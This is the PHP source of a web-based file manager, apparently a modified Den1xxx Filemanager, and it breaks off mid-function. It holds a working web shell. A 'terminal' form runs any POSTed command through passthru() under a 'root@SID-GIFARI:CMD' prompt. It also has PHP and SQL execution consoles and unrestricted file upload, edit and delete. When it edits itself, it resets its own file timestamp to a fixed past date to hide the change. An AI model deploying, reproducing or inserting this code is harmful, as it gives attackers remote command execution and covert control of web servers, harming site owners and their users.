$url_inc = '?fm=true'; if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){ $res = empty($_POST['sql']) ? '' : $_POST['sql']; $res_lng = 'sql'; } elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){ $res = empty($_POST['php']) ? '' : $_POST['php']; $res_lng = 'php'; } if (isset($_GET['fm_settings'])) { echo ' <table class="whole"> <form method="post" action=""> <tr><th colspan="2">'.__(''.__('$PNG-OP$').'').' - '.__('Settings').'</th></tr> '.(empty($msg)?'':'<tr><td class="row2" colspan="2">'.$msg.'</td></tr>').' '.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').' '.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').' '.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').' '.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').' '.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').' '.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').' '.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').' '.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').' '.fm_config_checkbox_row(__('Show').' xls','show_xls').' '.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').' '.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').' <tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr> <tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr> <tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr> <tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr> '.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').' '.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').' '.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').' '.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').' '.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').' <tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr> </form> </table> <table> <form method="post" action=""> <tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr> <tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr> <tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr> <tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr> <tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr> <tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr> <tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr> </form> </table>'; echo fm_tpl_form('php'),fm_tpl_form('sql'); } elseif (isset($proxy_form)) { die($proxy_form); } elseif (isset($res_lng)) { ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php'); else echo '</h2></td><td>'.fm_run_input('sql'); ?></td></tr></table></td> </tr> <tr> <td class="row1"> <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a> <form action="" method="POST" name="console"> <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/> <input type="reset" value="<?=__('Reset')?>"> <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run"> <?php $str_tmpl = $res_lng.'_templates'; $tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : ''; if (!empty($tmpl)){ $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : ''; $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n"; $select .= '<option value="-1">' . __('Select') . "</option>\n"; foreach ($tmpl as $key=>$value){ $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n"; } $select .= "</select>\n"; echo $select; } ?> </form> </td> </tr> </table> <?php if (!empty($res)) { $fun='fm_'.$res_lng; echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>'; } } elseif (!empty($_REQUEST['edit'])){ if(!empty($_REQUEST['save'])) { $fn = $path . $_REQUEST['edit']; $filemtime = filemtime($fn); if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg .= __('File updated'); else $msg .= __('Error occurred'); if ($_GET['edit']==basename(__FILE__)) { touch(__FILE__,1415116371); } else { if (!empty($fm_config['restore_time'])) touch($fn,$filemtime); } } $oldcontent = @file_get_contents($path . $_REQUEST['edit']); $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table border='0' cellspacing='0' cellpadding='1' width="100%"> <tr> <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$editlink?>"> <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea> <input type="submit" name="save" value="<?=__('Submit')?>"> <input type="submit" name="cancel" value="<?=__('Cancel')?>"> </form> </td> </tr> </table> <?php echo $auth['script']; } elseif(!empty($_REQUEST['rights'])){ if(!empty($_REQUEST['save'])) { if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively'])) $msg .= (__('File updated')); else $msg .= (__('Error occurred')); } clearstatcache(); $oldrights = fm_rights_string($path . $_REQUEST['rights'], true); $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>"> <?php if (is_dir($path.$_REQUEST['rights'])) { ?> <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/> <?php } ?> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') { if(!empty($_REQUEST['save'])) { rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']); $msg .= (__('File updated')); $_REQUEST['rename'] = $_REQUEST['newname']; } clearstatcache(); $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path; $backlink = $url_inc . '&path=' . $path; ?> <table class="whole"> <tr> <th><?=__('File manager').' - '.$path?></th> </tr> <tr> <td class="row1"> <?=$msg?> </td> </tr> <tr> <td class="row1"> <a href="<?=$backlink?>"><?=__('Back')?></a> </td> </tr> <tr> <td class="row1" align="center"> <form name="form1" method="post" action="<?=$link?>"> <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/> <input type="submit" name="save" value="<?=__('Submit')?>"> </form> </td> </tr> </table> <?php } else { //Let's rock! $msg = ''; if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) { if(!empty($_FILES['upload']['name'])){ $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']); if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){ $msg .= __('Error occurred'); } else { $msg .= __('Files uploaded').': '.$_FILES['upload']['name']; } } } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') { if(!fm_del_files(($path . $_REQUEST['delete']), true)) { $msg .= __('Error occurred'); } else { $msg .= __('Deleted').' '.$_REQUEST['delete']; } } elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) { if(!@mkdir($path . $_REQUEST['dirname'],0777)) { $msg .= __('Error occurred'); } else { $msg .= __('Created').' '.$_REQUEST['dirname']; } } elseif(!empty($_POST['search_recursive'])) { ini_set('max_execution_time', '0'); $search_data = find_text_in_files($_POST['path'], $_POST['mask'], $_POST['search_recursive']); if(!empty($search_data)) { $msg .= __('Found in files').' ('.count($search_data).'):<br>'; foreach ($search_data as $filename) { $msg .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a> '; } } else { $msg .= __('Nothing founded'); } } elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) { if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) { $msg .= __('Error occurred'); } else { fclose($fp); $msg .= __('Created').' '.$_REQUEST['filename']; } } elseif (isset($_GET['zip'])) { $source = base64_decode($_GET['zip']); $destination = basename($source).'.zip'; set_time_limit(0); $phar = new PharData($destination); $phar->buildFromDirectory($source); if (is_file($destination)) $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>'; else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['gz'])) { $source = base64_decode($_GET['gz']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); clearstatcache(); set_time_limit(0); //die(); $phar = new PharData($destination); $phar->buildFromDirectory($source); $phar->compress(Phar::GZ,'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } elseif (isset($_GET['decompress'])) { // $source = base64_decode($_GET['decompress']); // $destination = basename($source); // $ext = end(explode(".", $destination)); // if ($ext=='zip' OR $ext=='gz') { // $phar = new PharData($source); // $phar->decompress(); // $base_file = str_replace('.'.$ext,'',$destination); // $ext = end(explode(".", $base_file)); // if ($ext=='tar'){ // $phar = new PharData($base_file); // $phar->extractTo(dir($source)); // } // } // $msg .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done'); } elseif (isset($_GET['gzfile'])) { $source = base64_decode($_GET['gzfile']); $archive = $source.'.tar'; $destination = basename($source).'.tar'; if (is_file($archive)) unlink($archive); if (is_file($archive.'.gz')) unlink($archive.'.gz'); set_time_limit(0); //echo $destination; $ext_arr = explode('.',basename($source)); if (isset($ext_arr[1])) { unset($ext_arr[0]); $ext=implode('.',$ext_arr); } $phar = new PharData($destination); $phar->addFile($source); $phar->compress(Phar::GZ,$ext.'.tar.gz'); unset($phar); if (is_file($archive)) { if (is_file($archive.'.gz')) { unlink($archive); $destination .= '.gz'; } $msg .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done'). '. '.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination) .' <a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>'; } else $msg .= __('Error occurred').': '.__('no files'); } ?> <table class="whole" id="header_table" > <tr> <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th> </tr> <?php if(!empty($msg)){ ?> <tr> <td colspan="2" class="row2"><?=$msg?></td> </tr> <?php } ?> <tr> <td class="row2"> <table> <tr> <td> <?=fm_home()?> </td> <td> <?php if (isset($_POST['terminal'])) { // Get the command and directory from the form $cmd = $_POST['terminal-text'] . " 2>&1"; $cwd = $_POST['path']; // Use the hidden 'path' input as the directory // Validate and set the current working directory if (!empty($cwd) && is_dir($cwd)) { chdir($cwd); // Change to the specified directory } else { echo "<strong>Error:</strong> Invalid directory specified.<br>"; } // Execute the command and display output using passthru echo "<strong>root@SID-GIFARI:CMD</strong><br><pre>"; passthru($cmd); // passthru sends raw output directly to the browser echo "</pre>"; } ?> <form method="post" action="<?=$url_inc?>"> <input type="text" name="terminal-text" size="20" placeholder="root@SID-GIFARI:CMD" required> <input type="hidden" name="path" value="<?=$path?>" /> <input type="submit" name="terminal" value="Execute"> </form> </td> <td> <?php if(!empty($fm_config['make_directory'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="dirname" size="15"> <input type="submit" name="mkdir" value="<?=__('Make directory')?>"> </form> <?php } ?> </td> <td> <?php if(!empty($fm_config['new_file'])) { ?> <form method="post" action="<?=$url_inc?>"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" name="filename" size="15"> <input type="submit" name="mkfile" value="<?=__('New file')?>"> </form> <?php } ?> </td> <td> <form method="post" action="<?=$url_inc?>" style="display:inline"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15"> <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5"> <input type="submit" name="search" value="<?=__('Search')?>"> </form> </td> <td> <?=fm_run_input('php')?> </td> <td> <?=fm_run_input('sql')?> </td> </tr> </table> </td> <td class="row3"> <table> <tr> <td> <?php if (!empty($fm_config['upload_file'])) { ?> <form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data"> <input type="hidden" name="path" value="<?=$path?>" /> <input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" /> <input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" /> <input type="submit" name="test" value="<?=__('Upload')?>" /> </form> <?php } ?> </td> <td> <?php if ($auth['authorize']) { ?> <form action="" method="post"> <input name="quit" type="hidden" value="1"> <?=__('Hello')?>, <?=$auth['login']?> <input type="submit" value="<?=__('Quit')?>"> </form> <?php } ?> </td> <td> <?=fm_lang_form($language)?> </td> <tr> </table> </td> </tr> </table> <table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%"> <thead> <tr> <th style="white-space:nowrap"> <?=__('Filename')?> </th> <th style="white-space:nowrap"> <?=__('Size')?> </th> <th style="white-space:nowrap"> <?=__('Date')?> </th> <th style="white-space:nowrap"> <?=__('Rights')?> </th> <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th> </tr> </thead> <tbody> <?php $elements = fm_scan_dir($path, '', 'all', true); $dirs = array(); $files = array(); foreach ($elements as $file){ if(@is_dir($path . $file)){ $dirs[] = $file; } else { $files[] = $file; } } natsort($dirs); natsort($files); $elements = array_merge($dirs, $files); foreach ($elements as $file){ $filename = $path . $file; $filedata = @stat($filename); if(@is_dir($filename)){ $filedata[7] = ''; if (!empty($fm_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename); $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder"> </span> '.$file.'</a>'; $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').' zip',__('Archiving').' '. $file); $arlink = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').' '.$file); $style = 'row2'; if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; else $alert = ''; } else { $link = $fm_config['show_img']&&@getimagesize($filename) ? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\'' . fm_img_link($filename) .'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img"> </span> '.$file.'</a>' : '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file"> </span> '.$file.'</a>'; $e_arr = explode(".", $file); $ext = end($e_arr); $loadlink = fm_link('download',$filename,__('Download'),__('Download').' '. $file); $arlink = in_array($ext,array('zip','gz','tar')) ? '' : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').' '. $file)); $style = 'row1'; $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path . '\'"'; } $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>'; $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>'; ?> <tr class="<?=$style?>"> <td><?=$link?></td> <td><?=$filedata[7]?></td> <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td> <td><?=$rightstext?></td> <td><?=$deletelink?></td> <td><?=$renamelink?></td> <td><?=$loadlink?></td> <td><?=$arlink?></td> </tr> <?php } } ?> </tbody> </table> <div class="row3"><?php $mtime = explode(' ', microtime()); $totaltime = $mtime[0] + $mtime[1] - $starttime; echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a> | <a href="'.fm_site_url().'">.</a>'; if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion(); if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file(); if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2); if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>'; if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>'; if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>'; if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>'; ?> </div> <script type="text/javascript"> function download_xls(filename, text) { var element = document.createElement('a'); element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text); element.setAttribute('download', filename); element.style.display = 'none'; document.body.appendChild(element); element.click(); document.body.removeChild(element); } function base64_encode(m) { for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) { c = m.charCodeAt(l); if (128 > c) d = 1; else for (d = 2; c >= 2 << 5 * d;) ++d; for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f]) } b && (g += k[f << 6 - b]); return g } var tableToExcelData = (function() { var uri = 'data:application/vnd.ms-excel;base64,', template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>', format = function(s, c) { return s.replace(/{(\w+)}/g, function(m, p) { return c[p]; }) } return function(table, name) { if (!table.nodeType) table = document.getElementById(table) var ctx = { worksheet: name || 'Worksheet', table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1") } t = new Date(); filename = 'fm_' + t.toISOString() + '.xls' download_xls(filename, base64_encode(format(template, ctx))) } })(); var table2Excel = function () { var ua = window.navigator.userAgent; var msie = ua.indexOf("MSIE "); this.CreateExcelSheet = function(el, name){ if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer var x = document.getElementById(el).rows; var xls = new ActiveXObject("Excel.Application"); xls.visible = true; xls.Workbooks.Add for (i = 0; i < x.length; i++) { var y = x[i].cells; for (j = 0; j < y.length; j++) { xls.Cells(i + 1, j + 1).Value = y[j].innerText; } } xls.Visible = true; xls.UserControl = true; return xls; } else { tableToExcelData(el, name); } } } </script> </body> </html> <?php //Ported from ReloadCMS project http://reloadcms.com class archiveTar { var $archive_name = ''; var $tmp_file = 0; var $file_pos = 0; var $isGzipped = true; var $errors = array(); var $files = array(); function __construct(){ if (!isset($this->errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.': <br/>'; foreach ($Errors as $value) $message .= $value.'<br/>'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $i<count($file_array); $i++){ $filename = $file_array[$i]; if ($filename == $this->archive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if 